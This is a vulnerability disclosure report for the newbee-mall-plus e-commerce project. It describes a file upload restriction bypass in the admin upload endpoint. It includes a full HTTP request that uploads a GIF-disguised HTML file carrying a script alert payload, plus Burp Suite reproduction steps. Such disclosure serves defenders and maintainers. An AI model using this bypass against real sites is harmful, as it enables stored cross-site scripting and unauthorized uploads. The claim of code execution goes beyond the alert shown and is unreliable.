[security vulnerability] File upload vulnerability #46
Description
Recently, our team discovered a file upload vulnerability in the latest version of the project.
[Suggested description]
A file upload vulnerability exists in newbee plus mall. Because the upload method of uploadcontroller can bypass the upload restriction by adding malicious content to real images.
[Vulnerability Type]
File upload vulnerability
[Vendor of Product]
https://github.com/newbee-ltd/newbee-mall-plus
[Affected Product Code Base]
V2.4.1
[Affected Component]
`POST /admin/upload/file HTTP/1.1
Host: localhost:28079
User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:83.0) Gecko/83.0 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1137582032273165729786442929
Content-Length: 292
Origin: http://localhost:28079
Connection: close
Referer: http://localhost:28079/admin/goods/edit
Cookie: SESSION=YWZlMDUxNjMtYWMxNy00MTg1LWI0YTMtYjhjMWFlZmZjNmIy
Upgrade-Insecure-Requests: 1
-----------------------------1137582032273165729786442929
Content-Disposition: form-data; name="file"; filename="spacer.html"
Content-Type: image/gif
GIF89a���!ù��,����D�;
<script>alert("xss")</script>-----------------------------1137582032273165729786442929--`
[Impact Code execution]
true
[Vulnerability proof]
1.Access address http://localhost:28089/admin/goods , select a commodity information to modify and enter the file upload page.
2.Open burpsuite packet capturing agent and click to upload pictures.
3.By default, the system only supports JPG, PNG and GIF files. We can bypass them by adding malicious content to real images.
4.Modify the value of filename to spacer.html
Get the access path to file upload success:
5.Access the upload file path, and the vulnerability reproduction is completed.
